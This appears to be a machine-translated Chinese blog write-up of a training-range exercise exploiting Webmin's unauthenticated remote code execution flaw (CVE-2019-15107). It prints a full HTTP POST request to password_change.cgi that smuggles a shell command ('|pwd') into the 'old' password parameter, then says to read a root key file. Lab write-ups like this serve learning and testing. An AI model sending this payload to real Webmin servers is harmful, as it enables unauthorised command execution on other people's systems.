当前位置:网站首页>Moher College webmin unauthenticated remote code execution
Moher College webmin unauthenticated remote code execution
2022-07-04 07:44:00 【Lyswbb】
First, get to the shooting range and visit , Visit a landing page later

According to the title , Unauthorized rce, So you can look for history first CVE Number (CVE-2019-15107), After finding it, directly reproduce the vulnerability , The vulnerability lies in the password reset function :Webmin--Webmin confuration--Authentication

burp Grab traffic packets , Then change the parameters , Pay attention to the need to session_login.cgi Change to password_change.cgi, The following parameters can be copied directly , The trigger of this vulnerability point only needs to pass one expired Execute the command with parameters
POST /password_change.cgi HTTP/1.1
Host: 124.70.64.48:47372
Cookie: redirect=1; testing=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://124.70.64.48:47372
Referer: https://124.70.64.48:47372/session_login.cgi
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
user=dfgfgf&pam=&expired=2&old=test|pwd&new1=test2&new2=test2
Directly query the root key.txt that will do

边栏推荐
- Thesis learning -- time series similarity query method based on extreme point characteristics
- L2-013 red alarm (C language) and relevant knowledge of parallel search
- Rhcsa day 3
- Is l1-029 too fat (5 points)
- Basic DOS commands
- Valentine's Day is coming! Without 50W bride price, my girlfriend was forcibly dragged away...
- BibTex中参考文献种类
- Unity 从Inspector界面打开资源管理器选择并记录文件路径
- R language uses cforest function in Party package to build random forest based on conditional inference trees, uses varimp function to check feature importance, and uses table function to calculate co
- What determines vacuum permittivity and vacuum permeability? Why do these two physical quantities exist?
猜你喜欢

What are the work contents of operation and maintenance engineers? Can you list it in detail?

It's healthy to drink medicinal wine like this. Are you drinking it right
![[C language] open the door of C](/img/e0/2f107966423d6492c39995c77a445e.jpg)
[C language] open the door of C

Xcode 14之大变化详细介绍

Practice (9-12 Lectures)

User login function: simple but difficult

神经网络入门(下)
![[web security] nodejs prototype chain pollution analysis](/img/b6/8eddc9cbe343f2439da92bf342b0dc.jpg)
[web security] nodejs prototype chain pollution analysis

Ecole bio rushes to the scientific innovation board: the annual revenue is 330million. Honghui fund and Temasek are shareholders

With excellent strength, wangchain technology, together with IBM and Huawei, has entered the annual contribution list of "super ledger"!
随机推荐
【Go基础】2 - Go基本语句
2022-021ARTS:下半年開始
Handwritten easy version flexible JS and source code analysis
ZABBIX 5.0 monitoring client
[gurobi] establishment of simple model
Scanf read in data type symbol table
This article is enough for learning advanced mysql
How to improve your system architecture?
Flask 常用组件
Routing decorator of tornado project
Comparison between applet framework and platform compilation
L1-022 odd even split (10 points)
Heap concept in JVM
BibTex中参考文献种类
Div hidden in IE 67 shows blank problem IE 8 is normal
节点基础~节点操作
Rhcsa the next day
Wechat has new functions, and the test is started again
Preliminary study on temporal database incluxdb 2.2
Take you to master the formatter of visual studio code